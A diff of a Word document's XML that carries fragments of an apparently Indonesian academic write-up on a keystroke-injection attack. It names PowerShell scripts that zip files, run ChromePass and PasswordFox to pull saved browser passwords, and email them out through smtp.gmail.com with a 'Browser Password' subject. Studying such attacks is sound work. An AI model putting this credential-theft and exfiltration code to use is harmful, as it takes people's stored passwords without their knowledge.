-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -34222,25 +31789,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -34257,25 +31806,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -34309,25 +31840,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -34380,25 +31893,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -34415,25 +31910,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -34467,25 +31944,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -34502,25 +31961,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -34554,25 +31995,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -34595,9 +32018,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="100" w:name="_Toc43087613"/>
-      <w:bookmarkStart w:id="101" w:name="_Toc43087907"/>
-      <w:bookmarkStart w:id="102" w:name="_Toc43258884"/>
+      <w:bookmarkStart w:id="115" w:name="_Toc43087613"/>
+      <w:bookmarkStart w:id="116" w:name="_Toc43087907"/>
+      <w:bookmarkStart w:id="117" w:name="_Toc43258884"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -34659,9 +32082,9 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="100"/>
-      <w:bookmarkEnd w:id="101"/>
-      <w:bookmarkEnd w:id="102"/>
+      <w:bookmarkEnd w:id="115"/>
+      <w:bookmarkEnd w:id="116"/>
+      <w:bookmarkEnd w:id="117"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34682,7 +32105,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="103" w:name="_Toc43264847"/>
+      <w:bookmarkStart w:id="118" w:name="_Toc43264847"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -34697,7 +32120,7 @@
         </w:rPr>
         <w:t>Script</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="103"/>
+      <w:bookmarkEnd w:id="118"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -34708,6 +32131,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="119" w:name="_Hlk43336953"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -34734,16 +32158,12 @@
         </w:rPr>
         <w:t>powershell yang dijalankan, antara lain ChromeUpdateDownload.ps1, zipping.ps1, dan maintenance.ps1.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="id-ID"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -34762,7 +32182,14 @@
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
-        <w:t xml:space="preserve">powershell memiliki fungsi yang berbeda selama berlangsungnya penyerangan. </w:t>
+        <w:t>powershell memiliki fungsi yang berbeda selama berlangsungnya penyerangan.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="119"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="id-ID"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35022,9 +32449,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="104" w:name="_Toc43087614"/>
-      <w:bookmarkStart w:id="105" w:name="_Toc43087908"/>
-      <w:bookmarkStart w:id="106" w:name="_Toc43258885"/>
+      <w:bookmarkStart w:id="120" w:name="_Toc43087614"/>
+      <w:bookmarkStart w:id="121" w:name="_Toc43087908"/>
+      <w:bookmarkStart w:id="122" w:name="_Toc43258885"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35094,9 +32521,9 @@
         </w:rPr>
         <w:t>ChromeUpdateDownload.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="104"/>
-      <w:bookmarkEnd w:id="105"/>
-      <w:bookmarkEnd w:id="106"/>
+      <w:bookmarkEnd w:id="120"/>
+      <w:bookmarkEnd w:id="121"/>
+      <w:bookmarkEnd w:id="122"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35378,25 +32805,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>[</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>io.compression</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
+                              <w:t>[io.compression.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -35517,25 +32926,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>[</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>io.compression</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
+                        <w:t>[io.compression.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -35558,9 +32949,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="107" w:name="_Toc43087615"/>
-      <w:bookmarkStart w:id="108" w:name="_Toc43087909"/>
-      <w:bookmarkStart w:id="109" w:name="_Toc43258886"/>
+      <w:bookmarkStart w:id="123" w:name="_Toc43087615"/>
+      <w:bookmarkStart w:id="124" w:name="_Toc43087909"/>
+      <w:bookmarkStart w:id="125" w:name="_Toc43258886"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35630,9 +33021,9 @@
         </w:rPr>
         <w:t xml:space="preserve"> zipping.ps1</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="107"/>
-      <w:bookmarkEnd w:id="108"/>
-      <w:bookmarkEnd w:id="109"/>
+      <w:bookmarkEnd w:id="123"/>
+      <w:bookmarkEnd w:id="124"/>
+      <w:bookmarkEnd w:id="125"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35655,14 +33046,14 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="110" w:name="_Toc43264848"/>
+      <w:bookmarkStart w:id="126" w:name="_Toc43264848"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
         </w:rPr>
         <w:t>Menjalankan ChromePass dan PasswordFox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="110"/>
+      <w:bookmarkEnd w:id="126"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35814,9 +33205,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="_Toc43087616"/>
-      <w:bookmarkStart w:id="112" w:name="_Toc43087910"/>
-      <w:bookmarkStart w:id="113" w:name="_Toc43258887"/>
+      <w:bookmarkStart w:id="127" w:name="_Toc43087616"/>
+      <w:bookmarkStart w:id="128" w:name="_Toc43087910"/>
+      <w:bookmarkStart w:id="129" w:name="_Toc43258887"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -35904,9 +33295,9 @@
         </w:rPr>
         <w:t xml:space="preserve"> yang Diambil oleh ChromePass</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="111"/>
-      <w:bookmarkEnd w:id="112"/>
-      <w:bookmarkEnd w:id="113"/>
+      <w:bookmarkEnd w:id="127"/>
+      <w:bookmarkEnd w:id="128"/>
+      <w:bookmarkEnd w:id="129"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -35985,9 +33376,9 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="114" w:name="_Toc43087617"/>
-      <w:bookmarkStart w:id="115" w:name="_Toc43087911"/>
-      <w:bookmarkStart w:id="116" w:name="_Toc43258888"/>
+      <w:bookmarkStart w:id="130" w:name="_Toc43087617"/>
+      <w:bookmarkStart w:id="131" w:name="_Toc43087911"/>
+      <w:bookmarkStart w:id="132" w:name="_Toc43258888"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -36039,9 +33430,9 @@
         </w:rPr>
         <w:t>. Username dan Password yang Diambil oleh PasswordFox</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="114"/>
-      <w:bookmarkEnd w:id="115"/>
-      <w:bookmarkEnd w:id="116"/>
+      <w:bookmarkEnd w:id="130"/>
+      <w:bookmarkEnd w:id="131"/>
+      <w:bookmarkEnd w:id="132"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36064,7 +33455,7 @@
           <w:lang w:val="id-ID"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="117" w:name="_Toc43264849"/>
+      <w:bookmarkStart w:id="133" w:name="_Toc43264849"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="id-ID"/>
@@ -36079,7 +33470,7 @@
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="117"/>
+      <w:bookmarkEnd w:id="133"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -36337,271 +33728,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>function Send-ToEmail([string]$email, [string]$</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>attachmentpath){</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $message = new-object </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Net.Mail.MailMessage</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>;</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.From</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = $Username;</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $message.</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>To.Add</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($email);</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.Subject</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = "Browser Password";</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.Body</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = "Here the password list";</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $attachment = New-Object </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Net.Mail.Attachment</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($attachmentpath);</w:t>
-                            </w:r>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>message.Attachments.Add</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>($attachment);</w:t>
+                              <w:t>function Send-ToEmail([string]$email, [string]$attachmentpath){</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -36627,25 +33754,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $smtp = new-object </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>Net.Mail.SmtpClient</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>("smtp.gmail.com", "587");</w:t>
+                              <w:t xml:space="preserve">    $message = new-object Net.Mail.MailMessage;</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -36662,25 +33771,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">    $</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>smtp.EnableSSL</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve"> = $TRUE;</w:t>
+                              <w:t xml:space="preserve">    $message.From = $Username;</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
